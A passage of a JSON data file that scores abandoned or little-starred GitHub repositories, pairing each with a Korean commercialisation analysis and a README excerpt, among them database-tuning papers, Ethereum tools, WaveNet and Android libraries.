데이터베이스(데이터를 저장하고 관리하는 창고)를 더 똑똑하게 관리하도록 만드는 기술로, 기업들이 방대한 정보를 빠르고 효율적으로 다룰 수 있게 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 고객들이 자신의 데이터를 더 효율적으로 분석하고 관리할 수 있는 클라우드 플랫폼으로 판매\n","readme_excerpt":"\n## Researches and Practices in Autonomous Databases\n\n<p align=\"center\">\n    【English | <a href=\"README-Chinese.md\">中文</a>】\n</p>\n\n\nContinuously update the *autonomous database works* based on our past tutorials.\n\nKindly let us know if we have missed any great papers. Thank you!\n\nConference deadlines: https://github.com/ccfddl/ccf-deadlines\n\nThe up-to-date list of LLM4DB papers is moved to https://github.com/code4DB/LLM4DB\n\n(Note *conference postponement* may not be promptly synchronized, so just consider it as a reference.)\n\nTable of Contents\n=================\n\n* [0. Survey and Tutorial (16)](#0-survey-and-tutorial)\n* [1. Database Configuration](#1-database-configuration)\n    * [1.1 Knob Tuner (23)](#knob-tuner)\n    * [1.2 View Advisor (9)](#view-advisor)\n    * [1.3 Index Advisor (86)](#index-advisor)\n    * [1.4 Partition Advisor (11)](#partition-advisor)\n    * [1.5 Hybrid Advisor (2)](#hybrid-advisor)\n* [2. Query Optimization](#2-query-optimization)\n    * [2.1 Query Rewriter (13)](#qu","composite_score":0.3513,"license_safety_tag":"unknown"},{"name":"ConsenSys/ethereum-developer-tools-list","github_url":"https://github.com/ConsenSys/ethereum-developer-tools-list","stars":10,"language":"","license":"unknown","abandonment_months":15,"description":"# ConsenSys/ethereum-developer-tools-list 분석\n\n## 왜 보물인가\n블록체인 기술을 배우고 싶은 모든 개발자들이 찾는 '도구 지도'로, 복잡한 암호화폐 세계에서 실제로 쓸 수 있는 도구들을 한곳에 정리해놓은 귀중한 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 블록체인 교육 플랫폼 SaaS**\n온라인 강의 사이트에서 \"입","readme_excerpt":"\n# Ethereum Developer Tools List\nA guide to available tools, components, patterns, and platforms for developing applications on Ethereum.\n\nCreation of this list was spurred by product managers at ConsenSys who saw a need for better sharing of tools, development patterns, and components amongst both new and experienced blockchain developers.\n\nThis resource is meant to be focused on developer tools, but the repo also includes:\n* [Ethereum Ecosystem Resources](EcosystemResources.md) for useful DApps, educational resources, wallets, and services.\n\n## Contributions are welcome!\n\nFeel free to submit a pull request, with anything from small fixes to tools you'd like to add (or remove!). If adding a new tool, **please add a brief description** that you think new developers would understand.\n\nMany thanks to the ~100 contributors including [@corbpage](https://twitter.com/corbpage) and [@pakaplace](https://twitter.com/Parker_Place) of [Meridio](https://www.meridio.co/) for curating, and @jpantune","composite_score":0.3512,"license_safety_tag":"unknown"},{"name":"asyraffff/Open-Source-Ruby-and-Rails-Apps","github_url":"https://github.com/asyraffff/Open-Source-Ruby-and-Rails-Apps","stars":14,"language":"","license":"NOASSERTION","abandonment_months":17,"description":"# asyraffff/Open-Source-Ruby-and-Rails-Apps 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 오픈소스 도구들을 한곳에 모아놓은 리소스로, 개발 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 웹 애플리케이션을 빠르게 구축할 때 이 목록의 도구들을 활용해 개발 기","readme_excerpt":"![](https://blog.codemy.net/content/images/2019/01/ruby-rails-part-1-cover.jpg)\n# Awesome Ruby and Rails Open Source applications\n\n---\n\n<p align=\"left\">\n<a href=\"https://github.com/sindresorhus/awesome\"><img alt=\"Awesome\" src=\"https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg\" /></a>\n\nList of awesome open source applications written in Ruby and Rails. The main goal of this repository is to find free open source Ruby and Rails apps and start contributing 🚀 . Feel free to [Contribute](https://github.com/asyraffff/Open-Source-Ruby-and-Rails-Apps/blob/main/CONTRIBUTING.md) to the list, any suggestions are welcome!\n## Contain\n- cool ruby gem\n- real-world production app\n- CMS\n- Tutorial\n- Terminal app\n- boilerplate\n- backend with rails\n- clone of real-world startup/company\n- website\n- ide\n- ecommerce\n- ....\n## Support\nHey friend! Help me out for a couple of ☕️\n\n<a href=\"https://www.buymeacoffee.com/asyraff\" target=\"_blank\"><img src=\"https://","composite_score":0.3511,"license_safety_tag":"unknown"},{"name":"shadowsocksrr/shadowsocksr-android","github_url":"https://github.com/shadowsocksrr/shadowsocksr-android","stars":8,"language":"","license":"unknown","abandonment_months":86,"description":"","readme_excerpt":"：)\n","composite_score":0.3511,"license_safety_tag":"unknown"},{"name":"ibab/tensorflow-wavenet","github_url":"https://github.com/ibab/tensorflow-wavenet","stars":8,"language":"Python","license":"mit","abandonment_months":35,"description":"# TensorFlow WaveNet 저장소 분석\n\n## 왜 보물인가\n음성을 자연스럽게 만드는 인공지능 기술로, 음성 합성이 필요한 모든 서비스(내비게이션, 고객센터, 오디오북 등)에 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음성 합성 SaaS**: 기업들이 구독하는 자동 음성 생성 서비스 (월정액 모델)\n2. **콜센터 내부 도구**: 기","readme_excerpt":"# A TensorFlow implementation of DeepMind's WaveNet paper\n\n[![Build Status](https://travis-ci.org/ibab/tensorflow-wavenet.svg?branch=master)](https://travis-ci.org/ibab/tensorflow-wavenet)\n\nThis is a TensorFlow implementation of the [WaveNet generative neural\nnetwork architecture](https://deepmind.com/blog/wavenet-generative-model-raw-audio/) for audio generation.\n\n<table style=\"border-collapse: collapse\">\n<tr>\n<td>\n<p>\nThe WaveNet neural network architecture directly generates a raw audio waveform,\nshowing excellent results in text-to-speech and general audio generation (see the\nDeepMind blog post and paper for details).\n</p>\n<p>\nThe network models the conditional probability to generate the next\nsample in the audio waveform, given all previous samples and possibly\nadditional parameters.\n</p>\n<p>\nAfter an audio preprocessing step, the input waveform is quantized to a fixed integer range.\nThe integer amplitudes are then one-hot encoded to produce a tensor of shape <code>(num_samples, n","composite_score":0.351,"license_safety_tag":"safe"},{"name":"chenshenhai/koa2-note","github_url":"https://github.com/chenshenhai/koa2-note","stars":5,"language":"","license":"mit","abandonment_months":52,"description":"# chenshenhai/koa2-note 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필수적인 서버 기술(Koa2)을 배우고 구축하기 위한 완전한 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 이 학습 자료를 기반으로 웹 애플리케이션 개발 강의 플랫폼 제공\n2. **내부 업무 도구**: 기업의 개발팀이 표준화된 웹 서버","readme_excerpt":"# 《Koa2进阶学习笔记》已完结\n\n## 序言\n\n从2017年2月份开始写这本开源电子书，是为了记录自己的学习轨迹和分享技术心得，本开源书的Koa2的基础进阶教程已经完结，更多的Koa.js的高阶学习会在后续新开几本书进行探索。感谢这一年来所有读者的关注！O(∩_∩)O。\n\n本书为`Koa.js` 2.x 的入门书籍，如果想了解更多 `Koa.js` 的原理，可阅读 [《Koa.js 设计模式-学习笔记》](https://github.com/chenshenhai/koajs-design-note)\n\n更多前端技术学习可关注公众号 `大海码` `DeepSeaCode` \n\n\n<img src=\"https://user-images.githubusercontent.com/8216630/43264303-495bf52c-9118-11e8-85cd-4ec6fcc6d066.jpg\" width=\"160\" />\n\n\n![koa2-note](./note/images/koa2-note.png)\n\n\n## 关于作者\n\n- [关于作者(我)](https://chenshenhai.com)\n- 本书协议 MIT\n\n## 快速阅读地址\n\n- 个人博客站点阅读 [https://chenshenhai.com/koa2-note](https://chenshenhai.com/koa2-note)\n- Github Pages 阅读 [https://chenshenhai.github.io/koa2-note/](https://chenshenhai.github.io/koa2-note/)\n\n## 目录\n* [1. koa2开始]()\n    * [1.1 快速开始](https://github.com/ChenShenhai/koa2-note/blob/master/note/start/quick.md)\n    * [1.2 async/await使用](https://github.com/ChenShenhai/koa2-note/blob/master/note/start/async.md)\n    * [1.3 koa2简析结构](https://github.com/ChenShenhai/koa2-note/bl","composite_score":0.3509,"license_safety_tag":"safe"},{"name":"Kotlin/anko","github_url":"https://github.com/Kotlin/anko","stars":5,"language":"Kotlin","license":"apache-2.0","abandonment_months":79,"description":"# Kotlin/anko 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 개발을 더 간단하고 빠르게 만들어주는 도구로, 복잡한 코드를 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 앱 개발 플랫폼이나 저코드(Low-code) 개발 도구에 통합하여 개발 속도를 높일 수 있습니다.\n2. **내부 업무 도구**:","readme_excerpt":"[![obsolete JetBrains project](https://jb.gg/badges/obsolete.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)\n[![Download](https://api.bintray.com/packages/jetbrains/anko/anko/images/download.svg) ](https://bintray.com/jetbrains/anko/anko/_latestVersion)\n[![GitHub license](https://img.shields.io/badge/license-Apache%20License%202.0-blue.svg?style=flat)](https://www.apache.org/licenses/LICENSE-2.0)\n\n<img src=\"doc/logo.png\" alt=\"Anko logo\" height=\"101\" width=\"220\" />\n\n:warning: Anko is deprecated. Please see [this page](/GOODBYE.md) for more information.\n\n* * *\n\nAnko is a [Kotlin](https://www.kotlinlang.org/) library which makes Android application development faster and easier. It makes your code clean and easy to read, and lets you forget about rough edges of the Android SDK for Java.\n\nAnko consists of several parts:\n\n* *Anko Commons*: a lightweight library full of helpers for intents, dialogs, logging and so on;\n* *Anko Layouts*: a fast and type-safe way to writ","composite_score":0.3509,"license_safety_tag":"safe"},{"name":"ns1labs/orb","github_url":"https://github.com/ns1labs/orb","stars":75,"language":"Go","license":"MPL-2.0","abandonment_months":17,"description":"# ns1labs/orb 분석 보고서\n\n## 왜 보물인가\n사람들이 인터넷을 통해 서로를 안전하게 확인할 수 있는 기술로, 디지털 신원 확인 시장에서 수요가 계속 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **금융 서비스**: 은행 앱이나 송금 서비스에서 사용자 본인 확인 절차를 자동화\n2. **정부 서비스**: 운전면허 발급, 복지 신청 등 공공 ","readme_excerpt":"<img src=\"docs/images/ORB-logo-black@3x.png\" alt=\"Orb\" width=\"500\"/>\n<img src=\"https://user-images.githubusercontent.com/97463920/218170067-16a95078-6709-4828-b137-9791376b972e.png\" alt=\"Orb UI Preview\" width=\"500\"/>\n\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/orb-community/orb)](https://goreportcard.com/report/github.com/orb-community/orb)\n[![CodeCov](https://codecov.io/gh/orb-community/orb/branch/develop/graph/badge.svg)](https://app.codecov.io/gh/orb-community/orb/tree/develop)\n[![Go Reference](https://pkg.go.dev/badge/github.com/orb-community/orb.svg)](https://pkg.go.dev/github.com/orb-community/orb)\n\n**Orb** is a modern network observability platform built to provide critical visibility into increasingly complex and distributed networks. It can analyze network traffic, run synthetic network probes, and connect the resulting telemetry directly to your existing observability stacks with OpenTelemetry. Orb differentiates from other solutions by pushing analysis clo","composite_score":0.3509,"license_safety_tag":"unknown"},{"name":"ender-zhao/Clash-for-Windows_Chinese","github_url":"https://github.com/ender-zhao/Clash-for-Windows_Chinese","stars":9,"language":"JavaScript","license":"unknown","abandonment_months":11,"description":"# Clash for Windows 중국어 버전 분석\n\n## 왜 보물인가\n인터넷 접근성이 제한된 지역의 사용자들이 자유롭게 온라인 콘텐츠에 접근할 수 있도록 도와주는 필수 도구의 한국어/중국어 지원 버전입니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/프록시 서비스 회사**: 기술 지원이 어려운 중국 사용자를 위한 맞춤형 클라이언트 프로그램으로 제공\n2.","readme_excerpt":"# Clash for Windows Chinese<img src=\"https://github.com/Z-Siqi/Clash-for-Windows_Chinese/blob/main/image/image_clash.png?raw=true\" width=\"30\" height=\"30\">\n### Clash 汉化版\n\n**提供clash for windows的汉化版, 汉化补丁以及汉化版Clash安装程序**\n\n效果图\n\n[![photo](https://github.com/user-attachments/assets/83ed7ff1-9ec8-462b-be65-69a192440594)](https://github.com/Z-Siqi/Clash-for-Windows_Chinese/releases/)\n\n**支持的clash版本:**\n\n[0.15.3](https://github.com/Z-Siqi/Clash-for-Windows_Chinese/releases/tag/CFW-V0.15.3_CN-V4)\n~\n[当前的最新兼容](https://github.com/Z-Siqi/Clash-for-Windows_Chinese/releases/latest)\n\n**基本特征&介绍:**\n\n* 使用安装程序(Clash.for.Windows.Setup. ** . ** . ** .exe)安装的汉化版CFW将劫持更新，之后可直接通过应用内置的更新方式进行汉化版/软件更新\n* 使用安装包(Clash.for.Windows- ** . ** . ** -win.7z)请不要在解压时选择解压到当前文件夹，否则软件相关的所有文件将放到当前所在文件夹\n* ~app.asar需要替换掉对应版本的原版app.asar以完成汉化~\n* ~使用7z格式压缩包(app.7z)需要先进行解压，然后提取里面的app.asar并替换掉原有文件以完成汉化，即在节省流量~\n\n**<details><summary>下载前你需要知晓的内容:</summary>**\n\n~**The repository was archived (Nov 3, 2023) due to: [README.md](https://github.co","composite_score":0.3506,"license_safety_tag":"unknown"},{"name":"williamfiset/data-structures","github_url":"https://github.com/williamfiset/data-structures","stars":7,"language":"Java","license":"mit","abandonment_months":46,"description":"# William Fiset 데이터 구조 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 정보를 빠르고 효율적으로 처리하기 위한 기본 도구들을 정리한 교육 자료로, 모든 소프트웨어 개발의 기초가 되는 핵심 개념을 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **개발자 교육 플랫폼**: 신입 개발자나 비전공자를 위한 온라인 강의 콘텐츠로 활용하여 월 구독 형태","readme_excerpt":"[![No Maintenance Intended](http://unmaintained.tech/badge.svg)](http://unmaintained.tech/)\n\n# ⛔️ DEPRECATED ⛔️\n\n### Project status\n\nThis data-structures repository is deprecated. It is no longer being actively maintained or watched. The data structures in this repository was moved to the [Algorithms](https://github.com/williamfiset/Algorithms) repo in mid 2019. Please submit pull requests and issues to the [Algorithms](https://github.com/williamfiset/Algorithms) repo. \n\n### License\n\nThis repository is released under the [MIT license](https://opensource.org/licenses/MIT). In short, this means you are free to use this software in any personal, open-source or commercial projects. Attribution is optional but appreciated.\n","composite_score":0.3506,"license_safety_tag":"safe"},{"name":"CosmicMind/Material","github_url":"https://github.com/CosmicMind/Material","stars":14,"language":"Swift","license":"mit","abandonment_months":49,"description":"# CosmicMind/Material 분석\n\n## 왜 보물인가\n앱과 웹사이트를 예쁘고 통일감 있게 만드는 디자인 템플릿 모음으로, 비용 없이 전문적인 외형을 갖출 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스타트업 SaaS**: 초기 단계 앱 개발사가 빠르게 사용자 친화적 인터페이스를 구축하고 개발 비용을 절감할 수 있습니다.\n2. **기업 내부 ","readme_excerpt":"![Material](http://www.cosmicmind.com/material/github/material-logo.png)\n\n# Material\n\nWelcome to **Material,** a UI/UX framework for creating beautiful applications. Material's animation system has been completely reworked to take advantage of [Motion](https://github.com/CosmicMind/Motion), a library dedicated to animations and transitions.\n\n[![Carthage compatible](https://img.shields.io/badge/Carthage-Compatible-brightgreen.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![Accio supported](https://img.shields.io/badge/Accio-supported-0A7CF5.svg?style=flat)](https://github.com/JamitLabs/Accio)\n[![Version](https://img.shields.io/cocoapods/v/Material.svg?style=flat)](http://cocoapods.org/pods/Material)\n[![License](https://img.shields.io/cocoapods/l/Material.svg?style=flat)](https://github.com/CosmicMind/Material/blob/master/LICENSE.md)\n![Xcode 8.2+](https://img.shields.io/badge/Xcode-8.2%2B-blue.svg)\n![iOS 8.0+](https://img.shields.io/badge/iOS-8.0%2B-blue.svg)\n![Swift 4.0+](http","composite_score":0.3506,"license_safety_tag":"safe"},{"name":"miguel5612/MQSensorsLib","github_url":"https://github.com/miguel5612/MQSensorsLib","stars":216,"language":"C++","license":"MIT","abandonment_months":12,"description":"# MQSensorsLib 분석\n\n## 왜 보물인가\n공기질이나 가스를 측정하는 센서들을 쉽게 연결할 수 있도록 만든 도구로, IoT(사물인터넷) 기기 개발자들이 매번 처음부터 코드를 짜지 않고도 바로 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스마트홈 앱이나 실시간 공기질 모니터링 웹 서비스로 월 구독료 받기\n- **내부 ","readme_excerpt":"<!-- PROJECT SHIELDS -->\n<!--\n*** I'm using markdown \"reference style\" links for readability.\n*** Reference links are enclosed in brackets [ ] instead of parentheses ( ).\n*** See the bottom of this document for the declaration of the reference variables\n*** for contributors-url, forks-url, etc. This is an optional, concise syntax you may use.\n*** https://www.markdownguide.org/basic-syntax/#reference-style-links\n-->\n[![DOI](https://zenodo.org/badge/170540207.svg)](https://zenodo.org/badge/latestdoi/170540207)\n![Build Status][build-url]\n[![Contributors][contributors-shield]][contributors-url]\n[![Forks][forks-shield]][forks-url]\n[![Stargazers][stars-shield]][stars-url]\n[![Issues][issues-shield]][issues-url]\n[![MIT License][license-shield]][license-url]\n[![LinkedIn][linkedin-shield]][linkedin-url]\n\n# MQSensorsLib\n\nWe present a unified library for MQ sensors, this library allows to read MQ signals easily from Arduino, Genuino, ESP8266, ESP-32 boards whose references are MQ2, MQ3, MQ4, MQ5, ","composite_score":0.3504,"license_safety_tag":"safe"},{"name":"williamFalcon/pytorch-lightning","github_url":"https://github.com/williamFalcon/pytorch-lightning","stars":9,"language":"Python","license":"apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"<div align=\"center\">\n\n<img alt=\"Lightning\" src=\"https://pl-bolts-doc-images.s3.us-east-2.amazonaws.com/app-2/ptl_banner.png\" width=\"800px\" style=\"max-width: 100%;\">\n\n<br/>\n<br/>\n\n**The deep learning framework to pretrain and finetune AI models.**\n\n**Serving models?** Use [LitServe](https://github.com/Lightning-AI/litserve?utm_source=ptl_readme&utm_medium=referral&utm_campaign=ptl_readme) to build custom inference servers in pure Python.\n\n______________________________________________________________________\n\n<p align=\"center\">\n    <a href=\"#quick-start\" style=\"margin: 0 10px;\">Quick start</a> •\n  <a href=\"#examples\">Examples</a> •\n  <a href=\"#why-pytorch-lightning\">PyTorch Lightning</a> •\n  <a href=\"#lightning-fabric-expert-control\">Fabric</a> •\n  <a href=\"https://lightning.ai/?utm_source=ptl_readme&utm_medium=referral&utm_campaign=ptl_readme\">Lightning Cloud</a> •   \n  <a href=\"#community\">Community</a> •\n  <a href=\"https://pytorch-lightning.readthedocs.io/en/stable/\">Docs</a>\n</p>\n\n<","composite_score":0.3504,"license_safety_tag":"safe"},{"name":"30-seconds/30-seconds-of-python","github_url":"https://github.com/30-seconds/30-seconds-of-python","stars":6,"language":"Python","license":"CC-BY-4.0","abandonment_months":37,"description":"# 30-seconds-of-python 분석\n\n## 왜 보물인가\n프로그래밍을 배우려는 초보자들이 자주 사용하는 파이썬 코드 예제 모음으로, 간단한 설명과 함께 실용적인 코드 스니펫을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 학습 플랫폼(SaaS)**: 초보자 개발자를 위한 온라인 코딩 강좌 사이트에서 빠른 학습 자료로 통합\n2. **기업","readme_excerpt":"> **IMPORTANT NOTICE:**\n>\n> As of May, 2023, all 30-seconds content repositories have been merged into [30-seconds-of-code](https://github.com/30-seconds/30-seconds-of-code).\n>\n> Please watch, star and follow relevant activity there.\n\n[![Logo](/logo.png)](https://30secondsofcode.org/python/p/1)\n\n# 30 seconds of code\n\n> Short Python code snippets for all your development needs\n\n* Visit [our website](https://30secondsofcode.org) to view our snippet collection.\n* Use the [Search page](https://30secondsofcode.org/search) to find snippets that suit your needs. You can search by name, tag, language or using a snippet's description. Just start typing a term and see what comes up.\n* Browse the [Python Snippet collection](https://30secondsofcode.org/python/p/1) to see all the snippets in this project or click individual tags at the top of the same page to narrow down your search to a specific tag.\n* Click on each snippet card to view the whole snippet, including code, explanation and examples.\n","composite_score":0.3502,"license_safety_tag":"unknown"},{"name":"osnr/TabFS","github_url":"https://github.com/osnr/TabFS","stars":7,"language":"JavaScript","license":"GPL-3.0","abandonment_months":17,"description":"# TabFS 분석 보고서\n\n## 왜 보물인가\n웹브라우저의 열린 탭들을 폴더처럼 관리할 수 있게 만드는 도구로, 수십 개의 탭을 정리하는 번거로움을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 탭 관리 클라우드 플랫폼**\n- 사용자의 탭 정보를 서버에 저장하고, 여러 기기에서 동기화하는 구독 서비스\n\n**2. 내부 ","readme_excerpt":"# TabFS\n\nSee <https://omar.website/tabfs/>.\n\n(**update**: You can now **[sponsor further development of\nTabFS](https://github.com/sponsors/osnr)**!)\n","composite_score":0.3501,"license_safety_tag":"restricted"},{"name":"kriadmin/30-seconds-of-python-code","github_url":"https://github.com/kriadmin/30-seconds-of-python-code","stars":5,"language":"Python","license":"CC-BY-4.0","abandonment_months":37,"description":"# kriadmin/30-seconds-of-python-code 분석\n\n## 왜 보물인가\n파이썬 프로그래밍의 복잡한 개념들을 30초 안에 배울 수 있는 쉬운 학습 자료 모음이기 때문입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초급자 대상 파이썬 강좌 또는 실습 문제 라이브러리로 활용\n2. **기업 신입 교육 시스템**: IT","readme_excerpt":"> **IMPORTANT NOTICE:**\n>\n> As of May, 2023, all 30-seconds content repositories have been merged into [30-seconds-of-code](https://github.com/30-seconds/30-seconds-of-code).\n>\n> Please watch, star and follow relevant activity there.\n\n[![Logo](/logo.png)](https://30secondsofcode.org/python/p/1)\n\n# 30 seconds of code\n\n> Short Python code snippets for all your development needs\n\n* Visit [our website](https://30secondsofcode.org) to view our snippet collection.\n* Use the [Search page](https://30secondsofcode.org/search) to find snippets that suit your needs. You can search by name, tag, language or using a snippet's description. Just start typing a term and see what comes up.\n* Browse the [Python Snippet collection](https://30secondsofcode.org/python/p/1) to see all the snippets in this project or click individual tags at the top of the same page to narrow down your search to a specific tag.\n* Click on each snippet card to view the whole snippet, including code, explanation and examples.\n","composite_score":0.3501,"license_safety_tag":"unknown"},{"name":"Eerovil/TrackLater","github_url":"https://github.com/Eerovil/TrackLater","stars":9,"language":"Python","license":"MIT","abandonment_months":7,"description":"","readme_excerpt":"# TrackLater\n\n![](https://i.imgur.com/PgBb20C.png)\n\n<sub>Screenshot has green/red colors for my current two projects/clients. Commits, thyme entries and slack messages are automatically colored.</sub>\n\nForgot to track your time for work? TrackLater helps you track time after-the-fact by combining clues and showing your day on a simple timeline view.\n\nThe initial version supports fetching clues from\n* [Thyme](https://github.com/sourcegraph/thyme)\n* [ActivityWatch](https://github.com/ActivityWatch)\n* Git\n* Slack\n\nTime entries can be exported to\n* Toggl\n* Clockify\n\nIssues and projects/clients can be fetched from\n* Jira\n* Taiga\n* GitHub\n* Toggl (projects/clients)\n\n# Background\n\nEveryone who uses time-tracking for their work knows that it can be a real pain, especially if you're a forgetful person like me. I pretty much never remember to start my timers, and when I do, I for sure will not remember to turn them off.\n\nWhen working with multiple clients, it can be crucial (billing-wise) to tra","composite_score":0.3499,"license_safety_tag":"safe"},{"name":"L1aoXingyu/code-of-learn-deep-learning-with-pytorch","github_url":"https://github.com/L1aoXingyu/code-of-learn-deep-learning-with-pytorch","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":27,"description":"# L1aoXingyu/code-of-learn-deep-learning-with-pytorch 분석\n\n## 왜 보물인가\n인공지능 기초부터 실제 구현까지 배울 수 있는 완성된 학습 자료로, 전 세계 학생과 업무 담당자들이 AI를 독학하는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 교육 플랫폼**: 이 코드를 교재로 삼아 AI 입","readme_excerpt":"# 深度学习入门之PyTorch \n\nLearn Deep Learning with PyTorch\n\n非常感谢您能够购买此书，这个github repository包含有[深度学习入门之PyTorch](https://item.jd.com/17915495606.html)的实例代码。由于本人水平有限，在写此书的时候参考了一些网上的资料，在这里对他们表示敬意。由于深度学习的技术在飞速的发展，同时PyTorch也在不断更新，且本人在完成此书的时候也有诸多领域没有涉及，所以这个repository会不断更新作为购买次书的一个后续服务，希望我能够在您深度学习的入门道路上提供绵薄之力。\n\n**注意：由于PyTorch版本更迭，书中的代码可能会出现bug，所以一切代码以该github中的为主。**\n\n![image.png](http://upload-images.jianshu.io/upload_images/3623720-7cc3a383f486d157.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\n\n## 配置环境\n\n书中已经详细给出了如何基于Anaconda配置python环境，以及PyTorch的安装，如果你使用自己的电脑，并且有Nvidia的显卡，那么你可以愉快地进入深度学习的世界了，如果你没有Nvidia的显卡，那么我们需要一个云计算的平台来帮助我们学习深度学习之旅。[如何配置aws计算平台](https://github.com/SherlockLiao/code-of-learn-deep-learning-with-pytorch/blob/master/aws.md)\n\n\n**以下的课程目录和书中目录有出入，因为内容正在更新到第二版，第二版即将上线！！**\n## 课程目录\n### part1: 深度学习基础\n- Chapter 2: PyTorch基础\n    - [Tensor和Variable](https://github.com/SherlockLiao/code-of-learn-deep-learning-with-pytorch/blob/master/chapter2_PyTorch-Basics/Tensor-and-Variable.ipynb)    \n","composite_score":0.3498,"license_safety_tag":"unknown"},{"name":"MindorksOpenSource/android-mvp-architecture","github_url":"https://github.com/MindorksOpenSource/android-mvp-architecture","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":26,"description":"# android-mvp-architecture 평가 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발의 기초 틀을 제공하므로, 앱 개발 회사들이 처음부터 구조를 다시 설계하는 비용을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n안드로이드 앱 개발 교육 플랫폼이 이 구조를 학습 커리큘럼에 포함시켜 유료 강좌로 판매할 수 있습니","readme_excerpt":"[![Deprecated](https://img.shields.io/badge/deprecated-yes-red)](https://github.com/janishar/wimm-android-app)\n\n---\n# This Project is [Deprecated] goto latest project: [Modern Android Development - WhereIsMyMotivation](https://github.com/unusualcodeorg/wimm-android-app)\n---\n\n# Deprecated\n\n### Android MVP Architecture: Sample App\n\nThis repository contains a detailed sample app that implements MVP architecture using Dagger2, GreenDao, RxJava, FastAndroidNetworking, PlaceHolderView and AndroidDebugDatabase\n<p align=\"center\">\n  <img src=\"https://janishar.github.io/images/mvp-app-pics/mvp-login.png\" width=\"250\">\n  <img src=\"https://janishar.github.io/images/mvp-app-pics/main-view.png\" width=\"250\">\n  <img src=\"https://janishar.github.io/gifs/mvp-app.gif\" width=\"250\">\n</p>\n<br>\n<p align=\"center\">\n  <img src=\"https://janishar.github.io/images/mvp-app-pics/mvp-drawer.png\" width=\"200\">\n  <img src=\"https://janishar.github.io/images/mvp-app-pics/mvp-rating.png\" width=\"200\">\n  <img src=\"https://jan","composite_score":0.3496,"license_safety_tag":"safe"},{"name":"vinc3m1/RoundedImageView","github_url":"https://github.com/vinc3m1/RoundedImageView","stars":6,"language":"Java","license":"NOASSERTION","abandonment_months":40,"description":"# RoundedImageView 상용화 분석\n\n## 왜 보물인가\n모바일 앱에서 사진을 둥근 모양으로 예쁘게 표시해주는 기술로, 사용자 프로필 사진이나 상품 이미지를 전문적으로 보이게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS - 소셜 미디어 앱 개발 플랫폼**: 창작자들이 쉽게 프로필 사진을 둥근 형태로 꾸밀 수 있는 템플릿 제공\n","readme_excerpt":"# [ARCHIVED] RoundedImageView is no longer actively maintained as there are better alternatives available\n\nRoundedImageView was originally made with a primary goal of memory and rendering performance, and specifically only worked well on Bitmaps. It had some very poorly performing hacks built in for non-bitmaps, along with a lot of hard to maintain synchronization of ScaleTypes and sizing between the ImageView and the Drawable itself. \n\nRoundedImageView has also never supported image loaders like Picasso and Glide well, especially when they leverage TransitionDrawables for fade effects. These use cases are always best served by using the respective library's own Transformation APIs for image manipulation inside the async pipelines where the performance impact is less apparent.\n\nAs the ImageView and Drawable APIs evolved to support even more features like tinting, and Android's hardware acceleration support improved, the need for a library like RoundedImageView has dwindled while the ma","composite_score":0.3496,"license_safety_tag":"unknown"},{"name":"davemorrissey/subsampling-scale-image-view","github_url":"https://github.com/davemorrissey/subsampling-scale-image-view","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":25,"description":"# davemorrissey/subsampling-scale-image-view 분석\n\n## 왜 보물인가\n스마트폰에서 지도나 거대한 사진을 빠르고 부드럽게 확대/축소할 수 있게 해주는 핵심 기술로, 많은 앱에서 필수적으로 사용됩니다.\n\n## 어디에 쓸 수 있나\n1. **부동산 중개 플랫폼**: 평면도를 손가락으로 자유롭게 확대하여 세부 정보 확인 기능\n2.","readme_excerpt":"Subsampling Scale Image View\n===========================\n\nA custom image view for Android, designed for photo galleries and displaying huge images (e.g. maps and building plans) without `OutOfMemoryError`s. Includes pinch to zoom, panning, rotation and animation support, and allows easy extension so you can add your own overlays and touch event detection.\n\nThe view optionally uses subsampling and tiles to support very large images - a low resolution base layer is loaded and as you zoom in, it is overlaid with smaller high resolution tiles for the visible area. This avoids holding too much data in memory. It's ideal for displaying large images while allowing you to zoom in to the high resolution details. You can disable tiling for smaller images and when displaying a bitmap object. There are some advantages and disadvantages to disabling tiling so to decide which is best, see [the wiki](https://github.com/davemorrissey/subsampling-scale-image-view/wiki/02.-Displaying-images).\n\n#### Guid","composite_score":0.3495,"license_safety_tag":"safe"},{"name":"diit/overtime-cli","github_url":"https://github.com/diit/overtime-cli","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":12,"description":"# overtime-cli 상용화 분석\n\n## 왜 보물인가\n직원들의 초과근무 시간을 자동으로 추적하고 관리해주는 도구로, 소규모 회사들이 복잡한 근무시간 관리를 간편하게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. 